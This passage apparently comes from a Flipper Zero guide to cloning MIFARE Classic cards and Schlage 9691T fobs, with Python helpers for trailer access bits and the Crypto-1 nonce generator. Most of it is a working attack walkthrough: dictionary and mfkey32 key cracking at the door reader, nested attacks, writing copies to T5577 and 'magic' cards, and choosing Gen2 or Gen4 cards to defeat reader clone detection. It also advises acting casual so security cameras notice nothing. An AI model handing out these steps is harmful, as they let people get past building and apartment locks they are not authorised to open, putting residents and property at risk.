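def trailer_block(sector):
    """Absolute block number of a sector's trailer. Sectors 0-31 hold 4 blocks,
    sectors 32-39 (upper half of a 4K card) hold 16."""
    if sector < 32:
        return sector * 4 + 3
    return 128 + (sector - 32) * 16 + 15

def sector_of_block(block):
    return block // 4 if block < 128 else 32 + (block - 128) // 16

def decode_access_bits(b6, b7, b8):
    """Bytes 6-8 of the trailer -> [C1C2C3 of block 0, 1, 2, trailer].
    Every control bit is stored once plain and once inverted; if the two copies
    disagree the trailer is corrupt and a genuine card treats the sector as locked."""
    c1, inv_c1 = (b7 >> 4) & 0xF, b6 & 0xF
    c2, inv_c2 = b8 & 0xF, (b6 >> 4) & 0xF
    c3, inv_c3 = (b8 >> 4) & 0xF, b7 & 0xF
    if (c1 ^ inv_c1, c2 ^ inv_c2, c3 ^ inv_c3) != (0xF, 0xF, 0xF):
        raise ValueError("access bits fail the inverted-copy check")
    return [((c1 >> i) & 1) << 2 | ((c2 >> i) & 1) << 1 | ((c3 >> i) & 1)
            for i in range(4)]

def encode_access_bits(conds):
    """Inverse of decode_access_bits: four C1C2C3 values -> (byte6, byte7, byte8)."""
    c1 = sum(((c >> 2) & 1) << i for i, c in enumerate(conds))
    c2 = sum(((c >> 1) & 1) << i for i, c in enumerate(conds))
    c3 = sum((c & 1) << i for i, c in enumerate(conds))
    return (((~c2 & 0xF) << 4) | (~c1 & 0xF), (c1 << 4) | (~c3 & 0xF), (c3 << 4) | c2)

def describe_trailer(trailer):
    """Explain a 16-byte trailer from a dump. Key A reads back as zeros on a genuine
    card, so only its position is shown; Key B is visible only if the bits allow."""
    if len(trailer) != 16:
        raise ValueError("a sector trailer is exactly 16 bytes")
    conds = decode_access_bits(trailer[6], trailer[7], trailer[8])
    info = {"key_a": trailer[:6].hex().upper(), "key_b": trailer[10:].hex().upper(),
            "gpb": trailer[9]}
    for blk in range(3):
        info[f"block{blk}"] = dict(zip(DATA_OPS, DATA_RULES[conds[blk]]))
    info["trailer"] = dict(zip(TRAILER_OPS, TRAILER_RULES[conds[3]]))
    return info

# Constructed examples: the transport trailer and a production-style one.
TRANSPORT = bytes.fromhex("FFFFFFFFFFFF" "FF0780" "69" "FFFFFFFFFFFF")
PRODUCTION = bytes.fromhex("000000000000" "787788" "69" "A0A1A2A3A4A5")

if __name__ == "__main__":
    for name, t in (("transport", TRANSPORT), ("production", PRODUCTION)):
        print(name, describe_trailer(t))
    print("trailer of sector 35 is block", trailer_block(35))
```

Feed it the trailer bytes out of a saved dump before you write anything back: if decode_access_bits raises, the bytes you are about to write would lock the sector, and if the "bits write" entry for the trailer says "never", no key will ever let you change them again.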

Why "Magic" Cards Exist
Theory🐬🐬🐬🐬

Here's the problem: to make a perfect clone, you need to copy everything — including the UID in Block 0. But on a real MIFARE Classic card, Block 0 is burned in at the factory and can never be changed. So how do you clone the UID?

Enter "magic" cards — specially manufactured MIFARE Classic compatible cards where Block 0 is writable. They're made by Chinese manufacturers specifically for cloning, testing, and security research.

📊 The Magic Card Lineup

Gen1a
"Chinese Magic Card"
  • Backdoor command unlocks Block 0
  • All sectors writable
  • Cheapest option ($1-3 each)
  • ⚠️ Detectable — responds to the magic backdoor command
  • Works with 90% of readers
Gen2 (CUID)
"Changeable UID"
  • Block 0 writable via normal write commands
  • No special backdoor needed
  • Harder to detect than Gen1a
  • Slightly more expensive ($2-5 each)
  • ⚠️ Some readers detect the writable Block 0
Gen4 (Ultimate)
"The Swiss Army Knife"
  • 4-byte or 7-byte UID (switchable!)
  • Shadow mode — hides writable nature
  • Configurable backdoor (can be disabled)
  • Most expensive ($5-10 each)
  • Virtually undetectable in shadow mode
Decision Tree
4-byte UID + basic reader? → Gen1a (cheapest, works fine)
Reader detects Gen1a? → Gen2 (no backdoor to detect)
7-byte UID or paranoid reader? → Gen4 (handles everything)
⏱️ Why Emulation Sometimes Fails
Theory🐬🐬🐬🐬

You've cloned the card perfectly to your Flipper. All sectors read. All keys recovered. You tap it on the reader and... nothing. Why?

⚡ It's a Speed Problem

The Flipper Zero's NFC emulation is done in software — its ARM Cortex-M4 processor is interpreting commands and generating responses. A real MIFARE Classic chip does this in dedicated hardware (hardwired silicon circuits). The difference:

Response Time Comparison
MIFARE Chip:
~1μs
Flipper Zero:
~50-200μs
Reader timeout:
~5ms (strict) — ~20ms (lenient)

Most readers have lenient timing and the Flipper is fast enough. But some readers — especially newer ones or high-security installations — have very tight timing windows. If the Flipper's software emulation takes even a fraction too long, the reader times out and rejects the card.

🃏 Why Physical Magic Cards Always Work

A physical magic card contains actual MIFARE Classic silicon — the same dedicated hardware as the original card. It processes Crypto-1 authentication at hardware speed, meets every timing requirement, and is electrically indistinguishable from a genuine card. That's why the recommended workflow is:

The Recommended Workflow
📖Read original card with Flipper
🔓Crack keys (dictionary + mfkey32)
📝Write to magic card
Use physical card at reader

🤔 Other Reasons Emulation Can Fail

  • UID length mismatch: Some readers expect a 7-byte UID but the Flipper might be emulating 4 bytes (or vice versa).
  • Anti-collision issues: The Flipper's NFC stack handles the ISO 14443 anti-collision protocol slightly differently than real silicon. Some readers are picky about the exact byte timing during this phase.
  • Multi-sector authentication: If the reader authenticates to multiple sectors in rapid succession, the Flipper's CPU may not keep up with the Crypto-1 state for each session.
  • Physical coupling: The Flipper's antenna is smaller and differently positioned than a standard card. Holding it at the wrong angle or distance can cause weak coupling and communication errors.
Pro Tip
If emulation fails: write to a magic card first. It costs $2-3 for a Gen1a card and eliminates timing issues entirely. Keep the Flipper emulation for convenience (tapping into buildings you enter frequently), but have a physical backup for stubborn readers.
🔓 MIFARE Classic Cloning — Complete Guide
📋 Step-by-Step: Clone a MIFARE Classic Card
Intermediate🐬🐬🐬🐬🐬

This is the most requested Flipper Zero guide, and for good reason — MIFARE Classic cards are everywhere. They're used in apartment buildings, office buildings, hotels, gyms, universities, transit systems, parking garages, and more. If you have a white card or plastic fob that you tap to get into a building, there's a very good chance it's MIFARE Classic. Here's how to make a perfect, working clone.

🧠 Background: How MIFARE Classic Works

Before you start, understanding a few concepts will save you a LOT of frustration:

  • Sectors & Blocks: A MIFARE Classic 1K card has 16 sectors, each containing 4 blocks of 16 bytes. A 4K card has 40 sectors: the first 32 have 4 blocks each and the last 8 have 16 blocks each, with the trailer always the last block of its sector. The data you care about (your access credentials) lives in these sectors.
  • Keys: Each sector is locked by two keys — Key A and Key B. That's 32 keys total for a 1K card (16 sectors × 2 keys). You need these keys to read the data inside each sector.
  • Crypto-1 Encryption: MIFARE Classic uses an encryption scheme called Crypto-1. It was cracked back in 2008 and is fundamentally broken, which is why we can recover the keys. Every MIFARE Classic card in the world is vulnerable to this — it's not a Flipper hack, it's a protocol weakness.
  • UID (Unique Identifier): Every card has a 4-byte or 7-byte UID burned into Block 0, Sector 0. Many access systems check the UID as part of authentication. To make a real clone, you need to copy this UID too — which requires a special "magic" card.

🛒 What You Need

Item | Required? | Cost | Notes
Flipper Zero + Momentum | Yes | n/a | The Momentum firmware includes MFKey, Mifare Nested, and NFC Magic apps pre-installed
Original MIFARE Classic card/fob | Yes | n/a | The card you want to clone
Physical access to a reader | Usually | n/a | The door lock or turnstile reader, needed for the mfkey32 attack (Step 2). Not needed if the card uses all default keys.
Magic NFC card (Gen1a/Gen2/Gen4) | Optional | $2–10 | Only needed if you want a physical card clone instead of using Flipper emulation. See card types below.

🃏 Magic Card Types Explained

If you want a physical card (not just Flipper emulation), you need a "magic" card — a special MIFARE Classic card that allows writing to Block 0 (where the UID lives). Regular MIFARE Classic cards have Block 0 locked at the factory.

Type | UID Length | Price | Pros | Cons
Gen1a (Magic) | 4-byte | $1–3 | Cheapest, widely available, Flipper writes directly | Detectable by some readers (they send a "magic wakeup" command and Gen1a responds; real cards don't)
Gen2 (CUID) | 4-byte | $3–5 | Not detectable by Gen1a checks, writes via standard commands | Slightly more expensive, some can only be written once
Gen4 (Ultimate Magic) | 4 or 7-byte | $5–10 | Supports both UID lengths, undetectable, can configure advanced features | Most expensive, configuration can be complex
Which One Should I Buy?
Start with Gen1a — they're cheapest and work with most systems. If the reader rejects it (some high-security systems detect Gen1a cards), step up to Gen2. If your original card has a 7-byte UID, you need Gen4. Search Amazon for "UID changeable MIFARE Classic 1K" or "CUID MIFARE Classic" — a pack of 5 costs $5-15.

📖 The Complete Cloning Process

Step 1: Initial Read (Dictionary Attack) — ⏱️ 1-5 minutes

This is your first attempt. The Flipper tries a large list of known default keys against every sector. Many cards ship with default keys (like FFFFFFFFFFFF or A0A1A2A3A4A5) and some building managers never change them all.

Navigate to NFC → Read — From the Flipper main menu, press the center button to open the menu. Scroll down to NFC (it has a phone icon 📱). Press center to enter. Select Read.
Place the card on the back of the Flipper — The NFC antenna is in the center of the Flipper's back (not the top, not the bottom — dead center). Place the card flat against the back of the Flipper, centered. Hold steady.
Wait for detection — The Flipper will show "Reading..." and detect the card type. You'll see something like: MIFARE Classic 1K and the UID (e.g., UID: AB CD EF 12). Then the dictionary attack begins automatically.
Watch the progress — The screen shows: Found keys: X/32 and Sectors read: Y/16. This runs through hundreds of known keys. Let it finish completely — do NOT pull the card away or press back. It takes 1-5 minutes.

What you'll see when it finishes:

  • 32/32 keys found, 16/16 sectors read — 🎉 You got lucky! The card uses all default keys. Skip straight to Step 6 (Save).
  • Some keys found (e.g., 8/32, 4/16) — Partial success. You have some keys but not all. Continue to Step 2.
  • 0/32 keys, 0/16 sectors — The card uses no default keys at all. That's fine — continue to Step 2. This is normal for well-configured systems.
What's Actually Happening
The Flipper has a built-in dictionary of well over a thousand known MIFARE Classic keys. During this step, it tries every key in the dictionary against every sector. If a key works for a sector, it reads all the data in that sector. Momentum firmware includes an expanded dictionary with more keys than stock firmware.
Step 2: Extract MF Keys — Capture Reader Nonces — ⏱️ 30 seconds – 3 minutes

This is the most important step and the one that makes MIFARE Classic cloning actually work. You need physical access to the card reader (the door lock, turnstile, or whatever device reads the card).

Navigate to NFC → Extract MF Keys — On older Momentum versions this might be called "Detect Reader". It's in the main NFC menu.
You'll be asked to select your partially-read card — Choose the card you just read in Step 1. If you didn't save it yet, you may need to read it first and save it, then come back to Extract MF Keys.
Walk to the door reader — Go to the actual reader device on the wall. This is the thing you normally tap your card against to open the door.
Hold the Flipper FLAT against the reader — Press the center of the Flipper's back directly against the reader. The NFC antenna needs to be as close as possible. Hold it steady. You'll see the Flipper screen update.
The reader will try to authenticate — The reader thinks the Flipper is a real card and attempts to verify it. During this exchange, the Flipper captures cryptographic nonces — the mathematical handshake data that leaks key information due to the Crypto-1 weakness.
Collect multiple nonces — Hold the Flipper against the reader for at least 5-10 seconds. The screen shows how many nonces have been collected. More is better. If the reader beeps, flashes a light, or even opens the door — that's all normal, don't panic. Try to collect at least 5 nonces before pulling away.
Press Back when done — The nonces are saved to the Flipper's SD card automatically. You can now walk away from the reader.

Troubleshooting Step 2:

  • "No nonces captured" — You're holding the Flipper too far from the reader, or at the wrong angle. Try pressing it flat and centered. Some readers have the antenna at the top, bottom, or a specific spot — experiment with position.
  • The reader opens the door — This most likely means the reader only checks the card's UID (or a sector whose key was already in the dictionary), not the encrypted data you are still missing. UID-only checking is extremely insecure and means cloning is trivially easy; you may already have enough data from Step 1!
  • The reader doesn't react at all — The reader might be offline, might not be NFC (could be 125 kHz RFID), or might use a non-MIFARE protocol like DESFire. Make sure the original card actually works on this reader.
  • Only 1-2 nonces captured — Some readers only authenticate one sector. That's fine — you'll get keys for that sector, then repeat this step to collect nonces for other sectors in subsequent rounds.
⚠️ Don't Look Suspicious
Standing at a door reader holding a small electronic device for 30+ seconds can look suspicious to security cameras or passersby. This is your own building — you have every right to be there — but be aware of optics. Act casual. Pretend you're fiddling with your phone while holding the Flipper to the reader.
Step 3: Crack Keys with MFKey App — ⏱️ 30 seconds – 30 minutes

Now you turn those captured nonces into actual sector keys. The MFKey app does the heavy math.

Go to Main Menu → Applications → NFC → MFKey — On Momentum, this might also be accessible from the NFC menu directly. Navigate there and open it.
Press OK to start cracking — The app automatically finds the nonce data you captured in Step 2 and begins the mathematical key recovery process (called the mfkey32 attack).
Wait for it to finish — The screen shows progress as it crunches the numbers. You'll see something like Cracking sector 3... and then Found key: A0B1C2D3E4F5. This can take anywhere from 30 seconds to 30 minutes depending on how many nonces were captured and the complexity of the keys.
Check the results — When finished, it shows: Found X new keys. These keys are automatically added to your Flipper's key dictionary for future reads.

Troubleshooting Step 3:

  • "Found 0 new keys" — Not enough nonces were captured, or the nonces were corrupted (Flipper moved during capture). Go back to Step 2 and collect more nonces. Hold the Flipper more steady this time and collect for longer.
  • It's taking a very long time (>30 min) — This is unusual. The computation should be done in minutes. Check that the Flipper has enough battery and let it run.
What's Actually Happening
The mfkey32 attack exploits a weakness in Crypto-1: given two authentication attempts by the reader against the same sector (same UID, same key), the sector key can be recovered from the reader's 32-bit nonces and responses alone. That is why the Flipper collects several nonce pairs: each pair for a given sector is another chance to derive that sector's key. The "32" in the name refers to the 32-bit reader nonce/response pairs the tool works from; the underlying cryptanalysis comes from Garcia et al., "Dismantling MIFARE Classic" (2008).
Step 4: Read Again with New Keys — ⏱️ 1-5 minutes
Go back to NFC → Read — Same as Step 1.
Place the original card/fob on the Flipper again — Same position as before: centered on the back.
The dictionary attack runs again — But this time, your Flipper's dictionary now includes the keys cracked in Step 3, PLUS all the original default keys. You should see more sectors unlocking: Found keys: 18/32, Sectors read: 9/16 (higher numbers than Step 1).
Check: is it 32/32 keys and 16/16 sectors? — If YES: 🎉 All keys recovered! Skip to Step 6. If NO: repeat Steps 2-4. Each round typically recovers keys for a few more sectors.
How Many Rounds?
Expect 2-5 rounds of Extract MF Keys → MFKey → Read before you have all 32 keys. Each round usually unlocks a few more sectors. Some stubborn sectors may require the Nested Attack (Step 5). Don't give up after one round — this is an iterative process.
Step 5: Nested Attack (If Needed) — ⏱️ 1-10 minutes

If you have at least one valid key but can't get the rest through mfkey32, the Nested Attack is your next weapon. It exploits a different Crypto-1 weakness: the card's nonce generator is a 16-bit LFSR, so its nonces are predictable. Once you authenticate to one sector with a known key, the card's encrypted nonce for the next (nested) authentication leaks enough keystream to recover the unknown sector's key.

Navigate to Apps → NFC → Mifare Nested — This is a separate app from MFKey.
Select your partially-read card file — It needs the card data with at least one known key.
Place the original card on the Flipper — The Nested Attack needs to communicate with the live card (not just the saved data), because it performs cryptographic operations against the card's chip in real-time.
Let it run — The app uses your known key(s) to perform nested authentication attacks against unknown sectors. It may take 1-10 minutes depending on how many sectors remain.
Read the card one more time — Go to NFC → Read again. With the newly recovered keys, all 32 keys and 16 sectors should now be fully readable.
Step 6: Save the Full Dump — ⏱️ 10 seconds
After a complete read, the Flipper prompts you to save — Press the center button to save.
Name it something descriptive — Use the on-screen keyboard to type a name like Office_Badge or Gym_Card. Avoid spaces — use underscores.
File is saved — The complete card dump (all sectors, all keys, UID) is saved to /ext/nfc/YourName.nfc on the SD card. This file contains everything needed to emulate or clone the card.
Step 7: Emulate — ⏱️ Instant
Navigate to NFC → Saved — Browse to find your saved card.
Select the card → Emulate — The Flipper now pretends to BE this card. The screen shows "Emulating..." with the card name.
Hold the Flipper's CENTER against the reader — Not the top, not the bottom — the NFC antenna is in the dead center. Try holding it flat and flush. If the reader doesn't respond, try slight angle adjustments.

Troubleshooting Emulation:

  • Door opens — ✅ Perfect clone! You're done.
  • Reader flashes red / beeps angrily / nothing happens — The reader might be too fast for Flipper's emulation (some readers have strict timing requirements). Try repositioning. If it consistently fails, you need a physical magic card (Step 8).
  • Works sometimes but not always — Position and angle matter enormously. Practice finding the sweet spot. Some readers have their antenna at a specific location (top, bottom, or center of the pad).
Why Emulation Sometimes Fails
Flipper Zero's NFC chip (ST25R3916) emulates MIFARE Classic well, but some readers have very tight timing windows or perform additional checks that Flipper can't satisfy at software emulation speeds. Physical magic cards use actual MIFARE Classic silicon and always respond at hardware speed — they have a higher success rate on picky readers.
Step 8: Write to Magic Card (If Emulation Fails) — ⏱️ 30 seconds
Get a Magic Card — Buy a UID-changeable MIFARE Classic 1K card. Check your saved .nfc file — if the UID is 4 bytes (like AB CD EF 12), a Gen1a or Gen2 card works. If it's 7 bytes (like 04 AB CD EF 12 34 56), you need a Gen4 card.
Navigate to NFC → Saved → [your card] → Write — Select the Write option from the card's menu.
Place the blank magic card on the Flipper — Center of the back, same as reading. The Flipper writes ALL sector data PLUS the UID to the magic card.
Wait for "Write Success" — Takes about 5-15 seconds. The magic card is now an exact clone of the original.
Test the card on the reader — It should work identically to the original.

Troubleshooting Physical Clone:

  • "Write failed" — The card might not be a real magic card (some cheap cards are mislabeled), or it's the wrong type (Gen1a when you need Gen2). Try a different card from the pack.
  • Card written successfully but reader rejects it — If you used Gen1a, some readers perform a Gen1a detection test (they send a special "magic wakeup" command that only Gen1a cards respond to). Try a Gen2 or Gen4 card instead.
  • Card was working but stopped — The building may have updated their system, or the original card was deactivated. The clone mirrors the original — if the original stops working, the clone will too.
Pro Tip
If MFKey doesn't crack all keys after multiple rounds, try the Mifare Nested attack; it uses one known key to recover others. Between dictionary attack, mfkey32 and nested you can recover the keys of almost any classic MIFARE Classic card. The exception is chips with a hardened (unpredictable) nonce generator such as MIFARE Classic EV1, which resist the plain nested attack and need the much slower hardnested variant.
Important
Some modern readers add anti-cloning checks (for example Gen1a magic-card detection), and many sites have migrated away from MIFARE Classic altogether. This guide works for standard MIFARE Classic systems, which are still a large share of access control installations worldwide. If the reader uses DESFire EV1/EV2/EV3, SEOS or iCLASS SE, the data is protected by real cryptography and a different (and much harder) approach is needed.
🔐 Complete Schlage 9691T Cloning Guide
🏠 Schlage 9691T — Everything You Need to Know
Advanced🐬🐬🐬🐬🐬
📊 Difficulty: Intermediate-Advanced  |  ⏱️ Total Time: 30 min – 2 hours  |  💰 Cost: $0–15
This guide covers every single step to clone a Schlage 9691T dual-frequency fob using a Flipper Zero with Momentum firmware. It's written for someone who has never done this before. If you follow every step in order, you will have a working clone.

📋 What is the Schlage 9691T?

The Schlage 9691T is a small key fob — about the size of a guitar pick — commonly given to apartment residents in buildings with Schlage access control systems. What makes it special (and interesting for us) is that it contains two completely separate chips operating at different radio frequencies:

Chip | Frequency | Technology | What It Opens | Cloning Difficulty
🔵 Low-Frequency Chip | 125 kHz | HID ProxCard II compatible (or EM4100) | Building front door, parking garage, gates, elevators, common areas | Easy — no encryption, read & copy in seconds
🟠 High-Frequency Chip | 13.56 MHz | MIFARE Classic 1K (Crypto-1) | Apartment door (Schlage deadbolt lock) | Advanced — encrypted, requires key cracking (but it IS crackable)

Important: The number printed on the back of the fob (something like 6A13183702-001313) is just the factory serial number. It is NOT the card data, NOT the access code, and NOT useful for cloning. The "9691T" label on the front identifies the fob model. The actual access data is stored digitally inside the chips and can only be read with a device like the Flipper.

🛒 Shopping List — What You Need Before Starting

Item | Have It? | Where to Buy | Cost | Notes
Flipper Zero + Momentum firmware | ✅ Yes | - | - | Must have Momentum (or Xtreme/RogueMaster) for MFKey + Nested apps
Your Schlage 9691T fob | ✅ Yes | - | - | The original fob you want to clone
T5577 blank cards | ✅ Yes | - | - | For cloning the 125 kHz (building entrance) side
UID-changeable MIFARE Classic 1K cards | ❌ Need | Amazon: search "UID changeable MIFARE Classic 1K NFC card" or "CUID MIFARE Classic 1K" or "Magic Gen1a MIFARE card" | $3–10 for a pack | For cloning the 13.56 MHz (apartment door) side. Buy 2-3 cards in case one fails.
(Optional) Combo key fob | ❌ Optional | AliExpress/Amazon: search "T5577 + S50 combo key fob" or "dual frequency key fob 125kHz 13.56MHz" | $5–15 | A single fob with BOTH 125 kHz T5577 + 13.56 MHz MIFARE S50 chips — lets you carry one clone fob instead of two separate cards
Which Magic Card to Buy?
Your Schlage 9691T's MIFARE Classic chip most likely has a 4-byte UID. That means a cheap Gen1a or Gen2 (CUID) card will work. Start with Gen1a ($1-3 each). If the Schlage reader rejects it (some do Gen1a detection), try Gen2. You'll verify the UID length when you do the first read in Part 2 below.

🗂️ Overview: The Plan

You'll clone this fob in two completely separate operations, because the fob has two completely separate chips:

  • Part 1: Clone the 125 kHz side (building common areas) — Takes 5 minutes, easy, no encryption to crack
  • Part 2: Clone the 13.56 MHz side (apartment door) — Takes 30 min to 2 hours, requires cracking MIFARE Classic keys

You can do them in either order. Part 1 is simpler, so let's start there for a quick win.

🔵 Part 1: Clone the 125 kHz Side (Building Entrance)

Difficulty: Easy  |  Time: 5 minutes  |  What you need: Flipper + fob + T5577 blank card

The 125 kHz chip in your 9691T has zero encryption. It broadcasts an ID number in the clear, like shouting your name across a room. Anyone with a reader can hear it. That makes this part trivially easy.

Step 1.1: Read the 125 kHz Chip
From the Flipper main menu, navigate to 125 kHz RFID — Press the center button on your Flipper to open the main menu. Use the d-pad to scroll down. Look for the item labeled "125 kHz RFID" (it has a key icon 🔑). Press the center button to enter.
Select "Read" — You'll see options like Read, Saved, Add Manually, Extra. Select Read and press center.
Place the fob on the BOTTOM EDGE of the Flipper — This is critical and different from NFC! The 125 kHz RFID antenna is at the bottom edge of the Flipper Zero (the short edge opposite the IR blaster). Hold the fob against this bottom edge: NOT the center, NOT the back. Think of it like dipping the Flipper into the fob.
Wait for detection (1-5 seconds) — The screen will show "Reading..." and then the detected protocol and ID. You'll see something like:

HID H10301
FC: 123 Card: 45678

or

EM4100
ID: 6A 01 23 45 67

Either is fine — the Flipper auto-detects the protocol.
Save it — Press the center button. The Flipper asks you to name it. Type something like Schlage_Building using the on-screen keyboard. Press Save.

Troubleshooting:

  • Nothing detected after 10+ seconds — You're probably holding the fob in the wrong spot. Remember: bottom edge for 125 kHz. Move the fob slowly along the bottom edge until it clicks. Also make sure you're in the RFID menu, not the NFC menu.
  • Detected as "Unknown" — Try "Extra → Read ASK" or "Extra → Read PSK" from the RFID menu. Some less-common protocols need manual selection.
Step 1.2: Write to T5577 Blank Card
Navigate to 125 kHz RFID → Saved — Find the card you just saved (Schlage_Building).
Select it and choose "Write" — Press center on the card name, then select Write from the options.
Place a blank T5577 card on the BOTTOM EDGE of the Flipper — Same position as reading: the T5577 goes against the bottom edge. The screen shows "Writing..."
Wait for "Write Success" — Takes 1-3 seconds. The T5577 card is now programmed with the exact same ID as your 9691T's 125 kHz chip.
Test it! — Go to your building's front door, parking garage gate, or wherever the 125 kHz side of the fob normally works. Tap your freshly-written T5577 card against the reader. It should work identically to the original fob.
✅ Part 1 Done!
You now have a clone of the building entrance side. Your T5577 card opens the same doors as the 125 kHz chip in the 9691T. This was the easy part. Now for the apartment door...

🟠 Part 2: Clone the 13.56 MHz MIFARE Classic Side (Apartment Door)

Difficulty: Advanced  |  Time: 30 min – 2 hours  |  What you need: Flipper + fob + access to your Schlage door reader + magic NFC card (for physical clone)

The 13.56 MHz chip is a MIFARE Classic 1K with Crypto-1 encryption. Unlike the 125 kHz side, the data is encrypted — you can't just read and copy it. You need to crack the encryption keys first. The good news: MIFARE Classic's encryption has been broken since 2008, and the Flipper has all the tools to exploit it. It just takes a few steps.

The goal: Recover all 32 keys (16 sectors × 2 keys each) so you can read every byte of data on the card, then write an exact copy to a magic card.

Step 2.1: Initial Read — Dictionary Attack — ⏱️ 1-5 minutes
Navigate to NFC → Read — From the Flipper main menu, go to NFC (📱 icon). Select Read.
Place the 9691T fob on the CENTER of the Flipper's BACK — Different position than the 125 kHz side! The NFC (13.56 MHz) antenna is in the center of the Flipper's back. Place the fob flat against the back of the Flipper, roughly centered. Hold steady.
Wait for detection — The Flipper shows "Reading..." then detects: MIFARE Classic 1K and displays the UID (e.g., UID: AB CD EF 12). Note whether the UID is 4 bytes or 7 bytes — you'll need this info when buying magic cards.
Dictionary attack runs automatically — The screen shows progress: Found keys: X/32, Sectors read: Y/16. The Flipper is trying 1700+ known default keys against every sector. Do NOT move the fob or press any buttons — let it run to completion. This takes 1-5 minutes.
Check the results — When done, you'll see the final count. For a Schlage system:

Likely result: Found keys: 0-8/32, Sectors read: 0-4/16 — Schlage systems typically use non-default keys, so expect partial or zero results from dictionary alone. This is normal! Continue to Step 2.2.

Lucky result: Found keys: 32/32, Sectors read: 16/16 — All default keys! Skip straight to Step 2.6 (Save). This is rare for Schlage but possible.
Save the partial read — Even if only some sectors were read, save it. Name it Schlage_Apartment. You'll build on this partial read in subsequent steps.
Step 2.2: Extract MF Keys — Capture Reader Nonces — ⏱️ 30 sec – 3 min

This is the key step (literally). You need to go to your actual Schlage door reader — the device mounted on or near your apartment door that you normally tap the fob against.

Navigate to NFC → Extract MF Keys — On the Flipper, go back to the NFC menu. Look for "Extract MF Keys" (on older firmware versions it might say "Detect Reader"). Select it.
Select your saved card — Choose Schlage_Apartment (the card you saved in Step 2.1). The Flipper will emulate this card's UID when talking to the reader.
Walk to your apartment door — Go to the Schlage reader on your door. This is usually a small rectangular pad, sometimes with a Schlage logo, where you normally tap your fob.
Hold the Flipper FLAT and CENTERED against the reader — Press the center of the Flipper's back directly against the Schlage reader. The NFC antenna is in the center — push it flush against the reader pad. Hold still.
Watch the screen — You'll see: Collecting nonces... and a counter incrementing. The Schlage reader is attempting to authenticate with what it thinks is your fob, and the Flipper is capturing the cryptographic handshake data.

What you might notice:
  • The reader may beep — that's normal, it's attempting a read
  • The reader LED may flash (red, green, or orange) — that's normal
  • The reader may actually open the door lock — this means the Schlage reader uses UID-only authentication (very insecure!). If this happens, cloning is even easier: emulating the partial dump you saved in Step 2.1 may already be enough.
Collect 5-10+ nonces, then press Back — Hold the Flipper against the reader for at least 10-15 seconds. The more nonces, the better your chances of cracking all keys. You'll see the nonce count increase on screen. When you've collected enough (or the screen says "Nonce collection complete"), press the Back button. The nonces are auto-saved to the SD card.

Troubleshooting:

  • 0 nonces captured — Wrong position. The Schlage reader antenna might be at the top or bottom of the pad, not the center. Try moving the Flipper slowly across the face of the reader. Also ensure you selected the right saved card.
  • Reader doesn't react at all — The reader might be powered down, or it might be a Bluetooth-only Schlage lock (like Schlage Encode) which doesn't use NFC at all. Verify that your fob actually works on this reader.
  • Only 1-2 nonces even after 30 seconds — Some readers authenticate slowly. That's OK — even 1-2 nonces can yield keys. Proceed to Step 2.3.
Step 2.3: Crack Keys with MFKey — ⏱️ 30 sec – 30 min
Navigate to Main Menu → Applications → NFC → MFKey — Open the MFKey app. It may also be under Main Menu → NFC → MFKey depending on your Momentum version.
Press OK to start cracking — MFKey automatically finds the nonce data from Step 2.2 and begins the mathematical key recovery.
Wait — The screen shows: Cracking sector X... and then displays found keys. This can take 30 seconds to 30 minutes. For Schlage nonces, expect 1-5 minutes typically.
Check results — Found X new keys. These are automatically added to your key dictionary. If 0 keys found: go back to Step 2.2 and collect more nonces (hold longer, try different positions on the reader).
Step 2.4: Read Again — ⏱️ 1-5 minutes
Go to NFC → Read — Same as Step 2.1.
Place the 9691T fob on the Flipper's back (centered) — The dictionary attack runs again, now with your cracked keys included.
Check the progress — You should see more keys and sectors than before. Example: went from 2/32 keys to 14/32 keys.
All 32/32 keys and 16/16 sectors?
YES: 🎉 Skip to Step 2.6!
NO: Repeat Steps 2.2 → 2.3 → 2.4. Each round recovers more keys.
STUCK (same numbers after 2-3 rounds): Try the Nested Attack in Step 2.5.
Patience
For Schlage 9691T fobs, most people need 2-5 rounds of Extract MF Keys → MFKey → Read to recover all 32 keys. This is normal. Each round at the door takes about 30 seconds. The whole process typically takes 20-60 minutes including walking back and forth.
Step 2.5: Nested Attack (If Stuck) — ⏱️ 1-10 minutes

If you have some keys but repeating Steps 2.2-2.4 isn't finding more, the Nested Attack can fill in the gaps.

Navigate to Apps → NFC → Mifare Nested — This is a different app from MFKey.
Select your Schlage_Apartment card file — The app needs a card that has at least one known key.
Place the original 9691T fob on the Flipper (back, centered) — The Nested Attack communicates with the live chip to perform the attack.
Let it run (1-10 minutes) — The app authenticates with a known key, then starts a nested authentication to an unknown sector. Because the card's nonce generator is a predictable 16-bit LFSR, the encrypted nonce leaks enough keystream to recover that sector's key.
Read one final time — NFC → Read the fob again. With dictionary + mfkey32 + nested keys, you should now have 32/32 keys and 16/16 sectors fully read.
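Why the nested attack in Step 5 and Step 2.5 works, as an added example that is not part of the original page or of the Flipper/Momentum code: a model of the MIFARE Classic tag's nonce generator as described in "Dismantling MIFARE Classic" (a 16-bit LFSR with feedback polynomial x^16 + x^14 + x^13 + x^11 + 1). The function names, the bit-ordering convention and the starting state 0x1234 are my own choices for illustration; crapto1's prng_successor() uses a byte-swapped layout, so the numeric values are not interchangeable with that tool.

```python
# Added example (not Flipper/Momentum code): model of the MIFARE Classic tag nonce generator
# from "Dismantling MIFARE Classic" (Garcia et al., 2008): a 16-bit LFSR with feedback
# polynomial x^16 + x^14 + x^13 + x^11 + 1.  The 32-bit nonce nT is just 32 consecutive LFSR
# output bits, so its first 16 bits determine the last 16 and only 2^16 nonces can ever occur.
# Bit ordering here is an assumption chosen for readability; crapto1's prng_successor() uses a
# byte-swapped layout, so numeric values are not interchangeable with that tool.

MASK16 = 0xFFFF

def lfsr_step(state: int) -> int:
    """Clock the 16-bit LFSR once.  Bit 0 is the oldest bit and the one emitted next."""
    # Polynomial taps 16, 14, 13, 11 counted from the output end are state bits 0, 2, 3, 5.
    fb = (state ^ (state >> 2) ^ (state >> 3) ^ (state >> 5)) & 1
    return ((state >> 1) | (fb << 15)) & MASK16

def advance(state: int, ticks: int) -> int:
    """State after `ticks` clocks (the tag keeps clocking the LFSR between authentications)."""
    for _ in range(ticks):
        state = lfsr_step(state)
    return state

def tag_nonce(state: int) -> int:
    """The 32-bit nonce a tag in `state` sends, first emitted bit in the MSB."""
    nonce = 0
    for _ in range(32):
        nonce = (nonce << 1) | (state & 1)
        state = lfsr_step(state)
    return nonce

def state_from_nonce(nonce: int) -> int:
    """Invert tag_nonce(): the top 16 nonce bits are the state bits, oldest first."""
    state = 0
    for i in range(16):
        state |= ((nonce >> (31 - i)) & 1) << i
    return state

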